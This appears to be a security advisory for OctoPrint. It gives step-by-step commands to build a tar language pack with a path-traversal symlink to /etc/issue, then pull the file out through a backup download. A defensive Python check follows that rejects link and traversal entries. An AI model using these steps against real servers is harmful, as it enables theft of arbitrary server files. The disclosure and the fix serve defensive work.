Using the ZipSlip symlink variant, it is possible to steal any file from the remote OctoPrint server by uploading a maliciously crafted archive as a language pack and then downloading the stolen files within a backup archive.
To set up the OctoPrint web application, we used the dockerized version:
sudo docker volume create octoprint
sudo docker run -d -v octoprint:/octoprint -p 80:80 --name octoprint octoprint/octoprint
Generate a maliciously crafted archive as follows:
# unzip the language pack for italian
unzip language-pack-it.zip
cd ./it/LC_MESSAGES/
# generate a symlink as shown below, notice the difference between ../ and ./
ln -s ././../../../../../../../../../etc/issue issue.y3
# return to the directory that contains ./it/ and add it to a maliciously crafted TAR archive
cd ../../
tar -cvf it_crafted.tar ./it/
After initial configuration with default parameters, log in and head to OctoPrint Settings > Octoprint Appearance > Language Packs. Click on Manage > Upload additional Language Packs. Upload the it_crafted.tar archive as a language pack.
Now, head to Octoprint settings > Backup & Restore. Click on Create backup now. Download the new backup archive. Read the content of the file located within the backup archive at /basedir/translations/it/LC_MESSAGES/issue.y3. You will get the server-side issue file.
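The steps above work because the uploaded archive's symlink entry is extracted as-is and later followed when the backup is built. The following pre-extraction check is an added example, not OctoPrint's own code: the function names and the default destination directory are assumptions, and the sample archive is constructed in memory.

```python
import io
import os
import tarfile


def rejected_members(archive, dest="/basedir/translations"):
    """Return (name, reason) for every tar member that must not be extracted."""
    dest = os.path.abspath(dest)  # assumed extraction directory
    problems = []
    with tarfile.open(fileobj=archive, mode="r:*") as tar:
        for m in tar.getmembers():
            target = os.path.abspath(os.path.join(dest, m.name))
            if os.path.commonpath([dest, target]) != dest:
                problems.append((m.name, "path escapes destination"))
            elif m.issym() or m.islnk():
                # A language pack has no need for links; refuse all of them.
                problems.append((m.name, "link to " + m.linkname))
            elif not (m.isfile() or m.isdir()):
                problems.append((m.name, "special file"))
    return problems


def build_sample():
    """Constructed sample: a regular file, a symlink entry and a ../ entry."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        data = b'msgid ""\n'
        ok = tarfile.TarInfo("it/LC_MESSAGES/messages.po")
        ok.size = len(data)
        tar.addfile(ok, io.BytesIO(data))
        link = tarfile.TarInfo("it/LC_MESSAGES/issue.y3")
        link.type = tarfile.SYMTYPE
        link.linkname = "././../../../../../../../../../etc/issue"
        tar.addfile(link)
        tar.addfile(tarfile.TarInfo("../outside.txt"))  # empty regular file
    buf.seek(0)
    return buf


if __name__ == "__main__":
    for name, reason in rejected_members(build_sample()):
        print(f"REJECT {name}: {reason}")
```

An upload handler would refuse the whole archive when the returned list is not empty. On Python 3.12 and later, `extractall(path, filter="data")` applies comparable checks at extraction time.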